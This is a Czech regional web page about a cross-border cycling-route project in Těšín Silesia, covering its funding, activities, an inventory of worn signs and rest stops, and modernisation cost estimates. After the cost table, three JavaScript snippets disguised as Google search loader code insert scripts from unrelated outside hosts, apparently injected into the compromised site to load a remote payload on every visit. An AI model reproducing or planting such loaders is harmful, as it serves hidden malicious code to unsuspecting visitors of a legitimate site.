Právě se nacházíte: Úvod > Euroregion Tešínské Slezsko > Euroregionem na kole

Euroregionem na kole

Smluvní partneři Euroregionu TS – ŚC, Regionální sdružení územní spolupráce Těšínského Slezska a Stowarzyszenie Rozwoju i Współpracy Regionalnej „Olza“, společně realizují různé projekty vedoucí k dalšímu rozvoji území. Příkladem takové aktivity byl projekt „Regiotour“, který byl realizován v roce 2000 v rámci programu Phare Credo. Výstupem projektu bylo vytýčení 800 km cyklotras, 80 km tandemových tras pro nevidomé a slabozraké, pořízení 90 velkých informačních tabulí s mapou, umístění 60 odpočívek, vydání cykloprůvodce „Euroregion Těšínské Slezsko – Śląsk Cieszyński“ a map.

Projekt „Euroregionem na kole“ navazuje na projekt „Regiotour“ a jeho hlavním cílem je, s ohledem na dlouhé období od konce realizace projektu „Regiotour“, šetření současného stavu a příprava podkladů k modernizaci všech výstupů zmiňovaného projektu týkajících se české části Euroregionu TS – ŚC .

- Název projektu: Euroregionem na kole
- Registrační číslo: CZ.3.22/3.3.05/11.02300
- Partnerský projekt, typ B
- Partneři projektu: RSTS a SRiWR „Olza“
- Termín realizace: 1. 6. 2011 – 30. 3. 2012
- Celkové způsobilé výdaje projektu: 13 000 EUR (z toho příspěvek ERDF 85% – 11 050 EUR,
vlastní plnění 15% – 1 950 EUR)
- Partnerský projekt: „Rowerem po Euroregionie“

V rámci projektu byly provedeny tyto aktivity:

 Inventarizace současného stavu euroregionálních cyklistických tras „Regiotour“ – CZ.
 Obsahové a organizačně technické zajištění úvodní konference za účasti všech starostů členských obcí RSTS.
 Organizace a zajištění 6 pracovních setkání se samosprávami.
 Analýza a návrh opatření včetně finančního odhadu modernizace cyklistických tras, jejich značení, modernizace odpočívek a aktualizace map v písemné a elektronické podobě.
 Vydání propagačního letáku (500 ks).
 Obsahové a organizačně technické zajištění závěrečné konference (představení výstupů projektu).

Stejně jako česká část projektu, tak i polská část navazuje na již realizovaný projekt Regiontour. Hlavní aktivity polského projektu zahrnují modernizaci euroregionálního systému cyklotras na polské straně (montáž tabulek a tabulí a dalších prvků značení), vydání aktualizované mapy těchto tras zahrnující území celého Euroregionu, zpracování Koncepce tvorby a rozvoje turistických produktů na cyklistických stezkách Euroregionu TS-ŚC.

 

Výsledky inventarizace

Inventarizace současného stavu značení:

Celkem cyklistických značek                                                1 165 ks

Značky ve špatném stavu (nutná modernizace)                     484 ks

Značky v nevyhovujícím stavu                                               681 ks

 

Inventarizace a analýza současného stavu odpočivek

Celkem odpočivek                                                                    27 ks

V dobrém stavu                                                                          5 ks

Nutná drobná modernizace                                                         4 ks

(chybí koš, držák kol)

Špatný stav                                                                               14 ks

(prohnilé trámy, nutná modernizace střešní krytiny, chybí sedací desky)

Odpočivky neexistují                                                                   4 ks

 

Inventarizace a analýza současného stavu informačních tabulí s mapou

Celkem informačních tabulí s mapou                                           45 ks

V dobrém stavu                                                                            20 ks

Nutná modernizace                                                                        3 ks

Neexistuje                                                                                     22 ks

(byla odstraněna nebo zničená)

 

Finanční odhad modernizace :

Modernizace cyklistického značení                                   37 442 EUR

Modernizace odpočívek                                                   18 360 EUR

Modernizace map                                                       27 149,40 EUR

Modernizace celkem                                                82 951,40 EUR

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://theboatersnetwork.com/js/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = „http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js“;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

